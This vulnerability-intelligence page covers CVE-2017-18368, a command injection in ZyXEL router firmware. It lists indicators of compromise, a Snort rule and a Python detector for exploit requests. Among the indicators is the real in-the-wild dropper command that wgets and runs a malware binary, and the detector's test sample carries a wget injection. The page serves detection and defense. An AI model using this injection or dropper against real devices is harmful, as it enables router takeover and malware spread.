CVE-2017-18368
published 2019-05-02


Priority: P1 95 · critical · 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, due 2023-08-28
Exploited in the wild
EPSS: 94.51% (99.8th percentile)
The ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router distributed by TrueOnline has a command injection vulnerability in the Remote System Log forwarding function, which is accessible by an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

Affected (3 ranges)

Vendor   Product                  Version range   Fixed in
billion  5200w-t_firmware         -               -
zyxel    p660hn-t1a_v1_firmware   -               -
zyxel    p660hn-t1a_v2_firmware   -               -

Detection & IOCs (extracted from sources)

url: http://185.172.110[.]224/arm7
url: http://185.172.110[.]224/mips
ip: 185.172.110.224
port: 993
hash: 676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07
path: /cgi-bin/ViewLog.asp
command: cd /tmp;wget http://185.172.110[.]224/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7
filename: arm7
path: /tmp/mips
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE (CVE-2017-18368)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cgi-bin/ViewLog.asp"; startswith; endswith; http.request_body; content:"remote_submit_Flag="; startswith; content:"&remote_host="; distance:0; content:"&remoteSubmit=Save|0d 0a 0d 0a|"; endswith; fast_pattern; reference:url,seclists.org/fulldisclosure/2017/Jan/40; reference:cve,2017-18368; reference:url,github.com/pedrib/PoC/blob/master/advisories/zyxel_trueonline.txt; classtype:attempted-user; sid:2027092; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2017_18368, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
  • Exploit targets POST /cgi-bin/ViewLog.asp with injection via the remote_host parameter; look for semicolons and shell commands (wget, chmod) in the remote_host field of HTTP POST bodies to this endpoint.
  • The exploit HTTP request uses the distinctive User-Agent string 'Ankit'; alert on POST requests to /cgi-bin/ViewLog.asp with this User-Agent.
  • The POST body always begins with 'remote_submit_Flag=' and contains '&remote_host=' followed by injected shell commands; use these as body content anchors for detection (ET SID 2027092).
  • Malware dropper payload drops ARM7 binary to /tmp and executes it with argument 'zyxel'; monitor for process execution of files dropped to /tmp on embedded Linux devices.
  • C2 communication occurs over TCP port 993 (typically associated with IMAPS) to the dropper server; monitor for outbound TCP/993 connections from IoT/router devices to unexpected IPs.
  • The exploit is accessible without authentication; any unauthenticated POST to /cgi-bin/ViewLog.asp should be treated as suspicious on ZyXEL P660HN-T1A devices.
  • The vulnerability specifically affects the TrueOnline-distributed ZyXEL P660HN-T1A v1 firmware (TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31); other P660HN-T v1 variants sold in other countries may also be vulnerable but were not confirmed in a live environment.
  • The Metasploit module was tested only in an emulated environment, not on a live physical device; real-world behavior may differ.
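The detection points above, turned into a request-inspection check that a log-replay or proxy hook could run. This is an added example, not code from this page or from Emerging Threats; the sample requests are constructed, 192.0.2.10 is a documentation address standing in for any real host, and the finding names are hypothetical labels of its own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

VIEWLOG_PATH = "/cgi-bin/ViewLog.asp"
# Shell separators and fetch/exec tools that never belong in a syslog host field.
SHELL_META = re.compile(r"[;|`$]|\b(?:wget|curl|chmod|busybox|tftp)\b")

def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": urlsplit(target).path,
            "headers": headers, "body": body.decode("latin-1")}

def form_fields(body: str) -> dict:
    # Split on '&' only: older urllib parse_qs also split on ';', hiding the injection separator.
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields

def check_viewlog_request(raw: bytes) -> list:
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"] != VIEWLOG_PATH:
        return []
    body, findings = req["body"], []
    if body.startswith("remote_submit_Flag=") and "&remote_host=" in body:
        findings.append("body-form-anchors")        # ET SID 2027092 body anchors
    if body.endswith("&remoteSubmit=Save\r\n\r\n"):    # PoC tail; browser forms omit it
        findings.append("poc-body-tail")
    if any(SHELL_META.search(v) for v in form_fields(body).get("remote_host", [])):
        findings.append("shell-meta-in-remote_host")
    if req["headers"].get("user-agent") == "Ankit":
        findings.append("ua-ankit")
    return findings

def is_exploit_attempt(raw: bytes) -> bool:
    """Form anchors alone describe the legitimate form; anything more is a hit."""
    return any(f != "body-form-anchors" for f in check_viewlog_request(raw))

# Constructed samples (192.0.2.10 is a documentation address, not a real host).
HEAD = b"POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 192.168.1.1\r\n"
BENIGN = HEAD + b"User-Agent: Mozilla/5.0\r\n\r\nremote_submit_Flag=1&remote_host=192.0.2.10&remoteSubmit=Save"
ATTACK = HEAD + b"User-Agent: Ankit\r\n\r\nremote_submit_Flag=1&remote_host=192.0.2.10;wget+http://192.0.2.10/x&remoteSubmit=Save\r\n\r\n"
```

A legitimate save of the syslog form only trips the body anchors, so alerting on is_exploit_attempt rather than on the anchors alone keeps the Snort-style match from paging on every admin change.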

CVSS provenance

Source     Version   Score   Severity   Vector
nvd        v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck  -         9.8     CRITICAL   -
cisa       -         9.8     CRITICAL   -